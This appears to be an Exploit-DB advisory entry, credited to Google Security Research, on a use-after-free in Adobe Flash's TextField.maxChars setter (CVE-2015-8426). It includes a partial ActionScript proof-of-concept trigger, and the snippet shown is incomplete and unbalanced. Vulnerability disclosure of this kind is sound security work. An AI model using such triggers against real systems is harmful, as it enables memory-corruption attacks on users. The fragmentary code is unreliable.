Adobe Flash - TextField.maxChars Use-After-Free

ID EDB-ID:39650
Type exploitdb
Reporter Google Security Research
Modified 2016-04-01T00:00:00


Adobe Flash - TextField.maxChars Use-After-Free. CVE-2015-8426. Dos exploits for multiple platform


There is a use-after-free in the TextField.maxChars setter. If the maxChars the field is set to is an object with valueOf defined, the valueOf function can free the field's parent object, which is then used. A minimal PoC is as follows:

var times = 0;
var mc = this.createEmptyMovieClip("mc", 101);
var tf = mc.createTextField("tf", 102, 1, 1, 100, 100);
tf.maxChars = {valueOf : func};

function func(){

        if (times == 0){
            return 7;

        // Fix heap here

	return 7;

A sample swf and fla are attached.

Proof of Concept: